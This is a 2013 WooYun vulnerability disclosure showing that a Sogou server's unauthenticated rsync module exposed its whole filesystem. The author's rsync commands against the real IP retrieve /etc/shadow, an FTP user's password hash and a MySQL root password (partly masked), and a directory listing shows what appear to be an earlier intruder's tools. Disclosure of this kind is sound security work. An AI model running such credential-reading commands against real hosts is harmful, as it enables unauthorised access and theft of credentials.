当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-046353

漏洞标题:利用某运维安全缺陷可直捣搜狗内网服务器

相关厂商:搜狗

漏洞作者: felixk3y

提交时间:2013-12-18 14:37

修复时间:2014-02-01 14:38

公开时间:2014-02-01 14:38

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-12-18: 细节已通知厂商并且等待厂商处理中
2013-12-18: 厂商已经确认,细节仅向厂商公开
2013-12-28: 细节向核心白帽子及相关领域专家公开
2014-01-07: 细节向普通白帽子公开
2014-01-17: 细节向实习白帽子公开
2014-02-01: 细节向公众公开

简要描述:

利用某运维安全缺陷可直接进搜狗内网服务器,可间接渗透内网

详细说明:

#Rsync

root@kali:~# rsync 220.181.125.63::root/
drwxr-xr-x        4096 2013/12/05 12:13:16 .
-rw-r--r--           0 2013/03/01 05:43:55 .autofsck
-rw-r--r--           0 2012/11/01 06:58:16 .autorelabel
-rw-r--r--          29 2013/12/18 14:19:01 .ob.check
-rw-r--r--           0 2012/11/01 14:58:40 forcefsck
-rwxr-xr-x        2928 2012/07/05 17:46:26 mksimplerpm_sogou-data.sh
drwxr-xr-x        4096 2013/01/30 04:02:09 bin
drwxr-xr-x        1024 2012/11/01 06:55:55 boot
drwxr-xr-x        3260 2013/03/01 13:44:05 dev
drwxr-xr-x       12288 2013/12/18 04:02:13 etc
drwxr-xr-x        4096 2013/06/20 15:46:11 home
drwxr-xr-x        4096 2012/11/02 04:05:05 lib
drwxr-xr-x       12288 2013/01/30 04:02:07 lib64
drwx------       16384 2012/11/01 14:52:36 lost+found
drwxr-xr-x        4096 2009/10/01 22:58:39 media
drwxr-xr-x        4096 2012/04/09 11:17:09 misc
drwxr-xr-x        4096 2009/10/01 22:58:39 mnt
drwxr-xr-x          71 2013/12/05 12:13:16 opt
dr-xr-xr-x           0 2013/03/01 13:42:33 proc
drwxr-x---        4096 2013/12/18 14:18:41 root
drwxr-xr-x       12288 2013/01/23 04:02:16 sbin
drwxr-xr-x        4096 2013/03/11 17:44:07 search
drwxr-xr-x        4096 2012/11/01 06:52:42 selinux
drwxr-xr-x        4096 2009/10/01 22:58:39 srv
drwxr-xr-x           0 2013/03/01 13:42:34 sys
drwxr-xr-x        4096 2012/11/01 06:55:37 tftpboot
drwxrwxrwt          40 2013/12/18 14:19:00 tmp
drwxr-xr-x        4096 2013/12/05 12:13:16 usr
drwxr-xr-x        4096 2013/01/28 20:22:26 var


#2 随意查看shadow,也可将root密码改为自己的,上传上去

root@kali:~# rsync 220.181.125.63::root/etc/shadow shadow
root@kali:~# cat shadow 
root:$1$KVEZRMge$********NLbjFcgX2NQ.1:15822:0:99999:7:::
bin:*:15644:0:99999:7:::
daemon:*:15644:0:99999:7:::
adm:*:15644:0:99999:7:::
lp:*:15644:0:99999:7:::
sync:*:15644:0:99999:7:::
shutdown:*:15644:0:99999:7:::
halt:*:15644:0:99999:7:::
mail:*:15644:0:99999:7:::
news:*:15644:0:99999:7:::
uucp:*:15644:0:99999:7:::
operator:*:15644:0:99999:7:::
games:*:15644:0:99999:7:::
gopher:*:15644:0:99999:7:::
ftp:*:15644:0:99999:7:::
nobody:*:15644:0:99999:7:::
nscd:!!:15644:0:99999:7:::
vcsa:!!:15644:0:99999:7:::
ntp:!!:15644:0:99999:7:::
pcap:!!:15644:0:99999:7:::
dbus:!!:15644:0:99999:7:::
oprofile:!!:15644:0:99999:7:::
avahi:!!:15644:0:99999:7:::
rpc:!!:15644:0:99999:7:::
rpcuser:!!:15644:0:99999:7:::
nfsnobody:!!:15644:0:99999:7:::
mailnull:!!:15644:0:99999:7:::
smmsp:!!:15644:0:99999:7:::
apache:!!:15644:0:99999:7:::
sshd:!!:15644:0:99999:7:::
haldaemon:!!:15644:0:99999:7:::
avahi-autoipd:!!:15644:0:99999:7:::
xfs:!!:15644:0:99999:7:::
sabayon:!!:15644:0:99999:7:::
odin:!!:15645:0:99999:7:::
nagios:!!:15645::::::
netmonitor:!!:15645:0:99999:7:::
mysql:!!:15672::::::
ftpuser:!!:15733:0:99999:7:::
smarton:!!:15876:0:99999:7:::


#3 找到ftp密码

root@kali:~# rsync 220.181.125.63::root/etc/pure-ftpd/pureftpd.passwd ftp
root@kali:~# cat ftp
yangfang:$1$A/fynm.0$ZX0ai7S7wJ.0WdPo4a69o0:502:503::/search/ftp/yangfang/./::::


#4 找到mysql密码

root@kali:~# rsync 220.181.125.63::root/etc/pure-ftpd/pureftpd-mysql.conf mysql
root@kali:~# cat mysql 
##############################################
#                                            #
# Sample Pure-FTPd Mysql configuration file. #
# See README.MySQL for explanations.         #
#                                            #
##############################################
# Optional : MySQL server name or IP. Don't define this for unix sockets.
# MYSQLServer     127.0.0.1
# Optional : MySQL port. Don't define this if a local unix socket is used.
# MYSQLPort       3306
# Optional : define the location of mysql.sock if the server runs on this host.
MYSQLSocket     /var/lib/mysql/mysql.sock
# Mandatory : user to bind the server as.
MYSQLUser       root
# Mandatory : user password. You must have a password.
MYSQLPassword   root**********


#5 大量mysql数据库

root@kali:~/Desktop/sogou# rsync 220.181.125.63::root/var/lib/mysql/mysql/
drwx------       12288 2013/12/18 13:41:42 .
-rw-rw-rw-       33792 2013/08/05 21:05:24 ..\bin\Orcde12.dll
-rw-rw-rw-       38912 2013/10/06 12:09:46 ..\bin\TId.SO
-rw-rw-rw-       40960 2013/03/13 00:33:12 ..\bin\amd.dll
-rw-rw-rw-       40960 2013/04/08 05:32:53 ..\bin\cmdshell.dll
-rw-rw-rw-        3584 2013/03/11 17:17:48 ..\bin\cna12.dll
-rw-rw-rw-       16111 2013/06/12 13:40:29 ..\bin\dark.dll
-rw-rw-rw-       33792 2013/04/27 01:50:55 ..\bin\mbzakc12da.dll
-rw-rw-rw-       33792 2013/03/17 10:23:01 ..\bin\mbzakc12k.dll
-rw-rw-rw-        4838 2013/04/18 09:42:10 ..\bin\nusql.dll
-rw-rw-rw-        4096 2013/03/31 15:06:42 ..\bin\sws12.dll
-rw-rw-rw-       40960 2013/03/21 20:18:39 ..\bin\sys.dll
-rw-rw-rw-        4096 2013/07/17 15:32:56 ..\bin\tsq.dll
-rw-rw-rw-        4096 2013/08/28 04:50:09 ..\bin\v1sql.dll
-rw-rw-rw-       40960 2013/09/06 11:32:37 ..\bin\xmd.dll
-rw-rw-rw-       38912 2013/10/06 12:09:46 ..\data\TId.SO
-rw-rw-rw-       38912 2013/10/06 12:09:46 ..\lib\plugin\TId.SO
-rw-rw-rw-       40960 2013/03/13 00:33:12 ..\lib\plugin\amd.dll
-rw-rw-rw-       16111 2013/06/12 13:40:29 ..\lib\plugin\dark.dll
-rw-rw-rw-       40960 2013/03/21 20:18:38 ..\lib\plugin\sys.dll
-rw-rw-rw-       40960 2013/09/06 11:32:37 ..\lib\plugin\xmd.dll
-rw-rw-rw-       38912 2013/10/06 12:09:47 ..\share\TId.SO
-rw-rw-rw-       40960 2013/03/13 19:56:02 C:ET.dll
-rw-rw-rw-      143376 2013/03/13 19:56:13 C:ETX.exe
-rw-rw-rw-       15531 2013/03/13 19:56:14 C:ET_system.so
-rw-rw-rw-       40448 2013/05/31 01:51:51 C:\01361.exe
-rw-rw-rw-      101888 2013/07/09 01:08:42 C:\028tt.exe
-rw-rw-rw-       56832 2013/05/09 03:11:53 C:\03508.exe
-rw-rw-rw-       29696 2013/06/08 09:46:42 C:\036tt.exe
-rw-rw-rw-       55808 2013/05/02 17:52:18 C:\05001.exe
-rw-rw-rw-       59392 2013/07/26 04:13:09 C:\0718t.exe
-rw-rw-rw-       59392 2013/09/28 21:59:52 C:\0926k.exe
-rw-rw-rw-      241642 2013/03/14 00:24:01 C:\11188.exe
-rw-rw-rw-      143360 2013/03/29 00:27:59 C:\12345.exe
-rw-rw-rw-       59392 2013/08/10 21:00:52 C:\1308t.exe
-rw-rw-rw-       96768 2013/03/13 00:33:07 C:\18181.exe
-rw-rw-rw-           1 2013/03/23 01:25:35 C:\20121.exe
-rw-rw-rw-      167590 2013/04/16 21:39:55 C:\2013t.exe
-rw-rw-rw-      206202 2013/04/01 13:35:13 C:\33061.exe
-rw-rw-rw-       55808 2013/04/25 06:48:58 C:\360sd.exe
-rw-rw-rw-        8704 2013/09/07 02:51:48 C:\Documents and Settings\All Users\Start Menu\Programs\Startup\const.exe
-rw-rw-rw-       10752 2013/03/17 10:23:02 C:\Documents and Settings\All Users\Start Menu\Programs\Startup\cross.exe
-rw-rw-rw-       10752 2013/04/27 01:50:56 C:\Documents and Settings\All Users\Start Menu\Programs\Startup\zecro.exe
-rw-rw-rw-        8704 2013/09/07 02:51:48 C:\Documents and Settings\All Users\\#241\#270\#277\#252ʼ\#241\#271\#262˵\#245\\#263\#314\#320\#362\\#306\#364\#266\#257\const.exe
-rw-rw-rw-       10752 2013/03/17 10:23:02 C:\Documents and Settings\All Users\\#241\#270\#277\#252ʼ\#241\#271\#262˵\#245\\#263\#314\#320\#362\\#306\#364\#266\#257\cross.exe
-rw-rw-rw-       91648 2013/04/05 01:37:15 C:\Documents and Settings\All Users\\#241\#270\#277\#252ʼ\#241\#271\#262˵\#245\\#263\#314\#320\#362\\#306\#364\#266\#257\csossi.exe
-rw-rw-rw-        6680 2013/04/05 17:57:37 C:\Documents and Settings\All Users\\#241\#270\#277\#252ʼ\#241\#271\#262˵\#245\\#263\#314\#320\#362\\#306\#364\#266\#257\csossi.vbs
-rw-rw-rw-        6819 2013/04/09 00:36:38 C:\Documents and Settings\All Users\\#241\#270\#277\#252ʼ\#241\#271\#262˵\#245\\#263\#314\#320\#362\\#306\#364\#266\#257\csossie.vbs
-rw-rw-rw-           1 2013/07/17 15:32:56 C:\Documents and Settings\All Users\\#241\#270\#277\#252ʼ\#241\#271\#262˵\#245\\#263\#314\#320\#362\\#306\#364\#266\#257\smssz.exe
-rw-rw-rw-       10752 2013/04/27 01:50:56 C:\Documents and Settings\All Users\\#241\#270\#277\#252ʼ\#241\#271\#262˵\#245\\#263\#314\#320\#362\\#306\#364\#266\#257\zecro.exe
-rw-rw-rw-      208744 2013/06/16 06:33:04 C:\Program Files\1.exe
-rw-rw-rw-        8704 2013/09/07 02:51:48 C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\const.exe
-rw-rw-rw-       10752 2013/03/17 10:23:02 C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\cross.exe
-rw-rw-rw-       10752 2013/04/27 01:50:56 C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\zecro.exe
-rw-rw-rw-       40960 2013/03/13 00:33:12 C:\WINDOWS\SYSTEM32\amd.dll
-rw-rw-rw-       16111 2013/06/12 13:40:29 C:\WINDOWS\SYSTEM32\dark.dll
-rw-rw-rw-       40960 2013/03/21 20:18:38 C:\WINDOWS\SYSTEM32\sys.dll
-rw-rw-rw-       40960 2013/09/06 11:32:31 C:\WINDOWS\SYSTEM32\xmd.dll
-rw-rw-rw-       38912 2013/10/06 12:09:46 C:\WINDOWS\TId.SO
-rw-rw-rw-       40960 2013/10/06 23:12:24 C:\WINDOWS\TId.dll
-rw-rw-rw-       40960 2013/03/13 00:33:12 C:\WINDOWS\amd.dll
-rw-rw-rw-       16111 2013/06/12 13:40:29 C:\WINDOWS\dark.dll
-rw-rw-rw-       40960 2013/03/21 20:18:37 C:\WINDOWS\sys.dll
-rw-rw-rw-       38912 2013/10/06 12:09:46 C:\WINDOWS\system32\TId.SO
-rw-rw-rw-       40960 2013/04/08 05:32:53 C:\WINDOWS\system32\cmdshell.dll
-rw-rw-rw-       40960 2013/09/06 11:32:30 C:\WINDOWS\xmd.dll
-rw-rw-rw-       38912 2013/10/06 12:09:46 C:\WINNT\TId.SO
-rw-rw-rw-       40960 2013/04/08 05:32:53 C:\WINNT\cmdshell.dll
-rw-rw-rw-       40960 2013/03/13 00:33:12 C:\WINT\amd.dll
-rw-rw-rw-       16111 2013/06/12 13:40:29 C:\WINT\dark.dll
-rw-rw-rw-       40960 2013/03/21 20:18:37 C:\WINT\sys.dll
-rw-rw-rw-       40960 2013/09/06 11:32:30 C:\WINT\xmd.dll
-rw-rw-rw-       40960 2013/05/24 15:25:43 C:\Windows\Mysqli.dll
-rw-rw-rw-       43520 2013/05/24 13:10:50 C:\Windows\system32\Mysqli.dll
-rw-rw-rw-       56320 2013/03/28 06:44:58 C:\\WINDOWS\\system32\\ghost.dll
-rw-rw-rw-       40960 2013/03/13 00:33:12 C:\amd.dll
-rw-rw-rw-           1 2013/03/26 10:47:26 C:\boot1.exe
-rw-rw-rw-        1261 2013/05/31 16:52:21 C:\ccx.vbs
-rw-rw-rw-       58880 2013/05/14 06:57:53 C:\inter.exe
-rw-rw-rw-         814 2013/08/01 21:35:26 C:\mcsql.vbs
-rw-rw-rw-       40448 2013/05/24 02:28:52 C:\qqsds.exe
-rw-rw-rw-       79784 2013/03/21 20:18:32 C:\systl.exe
-rw-rw-rw-       20992 2013/05/05 13:34:12 C:\tt504.exe
-rw-rw-rw-       59392 2013/11/22 06:59:48 C:\wbxdt.exe
-rw-rw-rw-      148992 2013/09/26 17:35:35 C:\xiaoq.exe
-rw-rw-rw-       40960 2013/09/06 11:32:37 C:\xmd.dll
-rw-rw-rw-      354816 2013/04/18 09:42:10 C:\y.exe
-rw-rw-rw-       40960 2013/03/29 00:28:01 D:\amd.dll
-rw-rw-rw-       16111 2013/06/12 13:40:29 D:\dark.dll
-rw-rw-rw-       40960 2013/03/21 20:18:39 D:\sys.dll
-rw-rw----      339360 2013/05/15 03:27:37 Ghost.MYD
-rw-rw----        1024 2013/05/15 03:27:37 Ghost.MYI
-rw-rw----        8560 2013/04/08 05:32:57 Ghost.frm
-rw-rw----       38924 2013/10/06 12:09:46 STAUI.MYD
-rw-rw----        1024 2013/10/06 12:09:46 STAUI.MYI
-rw-rw----        8560 2013/10/06 12:09:28 STAUI.frm
-rw-rw-rw-      122368 2013/04/08 05:32:56 c:\docume~1\alluse~1\\#241\#270\#277\#252ʼ\#241\#271\#262˵\#245\\#263\#314\#320\#362\\#306\#364\#266\#257\1.bat
-rw-rw-rw-      122368 2013/05/12 22:47:12 c:\docume~1\alluse~1\\#241\#270\#277\#252ʼ\#241\#271\#262˵\#245\\#263\#314\#320\#362\\#306\#364\#266\#257\1.vbs
-rw-rw-rw-      354816 2013/04/18 09:42:11 c:\docume~1\alluse~1\\#241\#270\#277\#252ʼ\#241\#271\#262˵\#245\\#263\#314\#320\#362\\#306\#364\#266\#257\360.exe
-rw-rw-rw-           0 2013/06/01 17:29:24 c:\docume~1\alluse~1\\#241\#270\#277\#252ʼ\#241\#271\#262˵\#245\\#263\#314\#320\#362\\#306\#364\#266\#257\back.exe
-rw-rw-rw-        1261 2013/05/31 16:52:28 c:\docume~1\alluse~1\\#241\#270\#277\#252ʼ\#241\#271\#262˵\#245\\#263\#314\#320\#362\\#306\#364\#266\#257\vv.vbs
-rw-rw-rw-       59392 2013/04/08 05:32:55 c:\nc.exe
-rw-rw-rw-       56550 2013/04/08 05:32:57 c:\windows\system32\udf.dll
-rw-rw-rw-       32768 2013/04/29 17:09:38 c:\winnt\system.dll
-rw-rw----           0 2012/11/28 14:08:33 columns_priv.MYD
-rw-rw----        1024 2012/11/28 14:08:33 columns_priv.MYI
-rw-rw----        8820 2012/11/28 14:08:33 columns_priv.frm
-rw-rw----        1314 2012/12/14 13:05:08 db.MYD
-rw-rw----        4096 2012/12/25 17:55:45 db.MYI
-rw-rw----        9494 2012/11/28 14:08:33 db.frm
-rw-rw----           0 2012/11/28 14:08:33 func.MYD
-rw-rw----        1024 2012/11/28 14:08:33 func.MYI
-rw-rw----        8665 2012/11/28 14:08:33 func.frm
-rw-rw----       56332 2013/07/17 15:11:51 ghost.MYD
-rw-rw----        1024 2013/07/17 15:11:51 ghost.MYI
-rw-rw----        8560 2013/07/17 15:11:51 ghost.frm
-rw-rw----       21497 2012/11/28 14:08:33 help_category.MYD
-rw-rw----        3072 2012/11/28 14:08:33 help_category.MYI
-rw-rw----        8700 2012/11/28 14:08:33 help_category.frm
-rw-rw----       79588 2012/11/28 14:08:33 help_keyword.MYD
-rw-rw----       14336 2012/11/28 14:08:33 help_keyword.MYI
-rw-rw----        8612 2012/11/28 14:08:33 help_keyword.frm
-rw-rw----        7632 2012/11/28 14:08:33 help_relation.MYD
-rw-rw----       15360 2012/11/28 14:08:33 help_relation.MYI
-rw-rw----        8630 2012/11/28 14:08:33 help_relation.frm
-rw-rw----      390028 2012/11/28 14:08:33 help_topic.MYD
-rw-rw----       17408 2012/11/28 14:08:33 help_topic.MYI
-rw-rw----        8770 2012/11/28 14:08:33 help_topic.frm
-rw-rw----           0 2012/11/28 14:08:33 host.MYD
-rw-rw----        1024 2012/11/28 14:08:33 host.MYI
-rw-rw----        9416 2012/11/28 14:08:33 host.frm
-rw-rw----       37388 2013/04/09 00:36:38 inerueg.MYD
-rw-rw----        1024 2013/04/09 00:36:38 inerueg.MYI
-rw-rw----        8560 2013/04/09 00:36:38 inerueg.frm
-rw-rw-rw-       12896 2013/10/31 20:59:51 lib_mysqludf_sys.so
-rw-rw----          20 2013/08/21 14:06:17 myhexc.MYD
-rw-rw----        1024 2013/08/21 14:06:17 myhexc.MYI
-rw-rw----        8560 2013/08/21 14:06:16 myhexc.frm
-rw-rw----           0 2012/11/28 14:08:33 proc.MYD
-rw-rw----        1024 2012/11/28 14:08:33 proc.MYI
-rw-rw----        9691 2012/11/28 14:08:33 proc.frm
-rw-rw----           0 2012/11/28 14:08:33 procs_priv.MYD
-rw-rw----        1024 2012/11/28 14:08:33 procs_priv.MYI
-rw-rw----        8875 2012/11/28 14:08:33 procs_priv.frm
-rw-rw----        6828 2013/05/08 13:50:40 rtyuj.MYD
-rw-rw----        1024 2013/05/08 13:50:40 rtyuj.MYI
-rw-rw----        8560 2013/05/08 13:50:40 rtyuj.frm
-rw-rw----        6680 2013/04/05 20:35:55 rtyujn.MYD
-rw-rw----        1024 2013/04/05 20:35:55 rtyujn.MYI
-rw-rw----        8560 2013/04/05 20:35:55 rtyujn.frm
-rw-rw----           0 2012/11/28 14:08:33 tables_priv.MYD
-rw-rw----        1024 2012/11/28 14:08:33 tables_priv.MYI
-rw-rw----        8947 2012/11/28 14:08:33 tables_priv.frm
-rw-rw----       40972 2013/07/27 16:25:36 tempEx.MYD
-rw-rw----        1024 2013/07/27 16:25:36 tempEx.MYI
-rw-rw----        8560 2013/07/27 16:25:36 tempEx.frm
-rw-rw----       87068 2013/07/27 16:25:37 tempExT.MYD
-rw-rw----        1024 2013/07/27 16:25:37 tempExT.MYI
-rw-rw----        8560 2013/07/27 16:25:37 tempExT.frm
-rw-rw----       15540 2013/07/27 16:25:38 tempExT1.MYD
-rw-rw----        1024 2013/07/27 16:25:38 tempExT1.MYI
-rw-rw----        8560 2013/07/27 16:25:38 tempExT1.frm
-rw-rw----      208756 2013/06/18 06:40:42 tempMix1.MYD
-rw-rw----        1024 2013/06/18 06:40:42 tempMix1.MYI
-rw-rw----        8560 2013/06/18 06:40:41 tempMix1.frm
-rw-rw----           0 2012/11/28 14:08:33 time_zone.MYD
-rw-rw----        1024 2012/11/28 14:08:33 time_zone.MYI
-rw-rw----        8636 2012/11/28 14:08:33 time_zone.frm
-rw-rw----           0 2012/11/28 14:08:33 time_zone_leap_second.MYD
-rw-rw----        1024 2012/11/28 14:08:33 time_zone_leap_second.MYI
-rw-rw----        8624 2012/11/28 14:08:33 time_zone_leap_second.frm
-rw-rw----           0 2012/11/28 14:08:33 time_zone_name.MYD
-rw-rw----        1024 2012/11/28 14:08:33 time_zone_name.MYI
-rw-rw----        8606 2012/11/28 14:08:33 time_zone_name.frm
-rw-rw----           0 2012/11/28 14:08:33 time_zone_transition.MYD
-rw-rw----        1024 2012/11/28 14:08:33 time_zone_transition.MYI
-rw-rw----        8686 2012/11/28 14:08:33 time_zone_transition.frm
-rw-rw----           0 2012/11/28 14:08:33 time_zone_transition_type.MYD
-rw-rw----        1024 2012/11/28 14:08:33 time_zone_transition_type.MYI
-rw-rw----        8748 2012/11/28 14:08:33 time_zone_transition_type.frm
-rw-rw----        6924 2013/05/15 14:16:59 tinerukk.MYD
-rw-rw----        1024 2013/05/15 14:16:59 tinerukk.MYI
-rw-rw----        8560 2013/05/15 14:16:59 tinerukk.frm
-rw-rw----        1508 2013/11/12 07:24:46 tinerukk2.MYD
-rw-rw----        1024 2013/11/12 07:24:46 tinerukk2.MYI
-rw-rw----        8560 2013/11/12 07:24:45 tinerukk2.frm
-rw-rw----         332 2012/12/26 18:47:53 user.MYD
-rw-rw----        2048 2012/12/26 18:47:53 user.MYI
-rw-rw----       10330 2012/11/28 14:08:33 user.frm
-rw-rw----       12908 2013/10/31 20:59:51 yongger.MYD
-rw-rw----        1024 2013/10/31 20:59:51 yongger.MYI
-rw-rw----        8560 2013/10/31 20:59:51 yongger.frm

漏洞证明:

114.jpg

修复方案:

你比我懂...

版权声明:转载请注明来源 felixk3y@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-12-18 16:51

厂商回复:

收到,感谢支持

最新状态:

暂无

漏洞评价:

评论

  1. 2013-12-18 15:05 | 灬相随灬 ( 普通白帽子 | Rank:369 漏洞数:68 | 大胆天下去得,小心寸步难行。)

    这个屌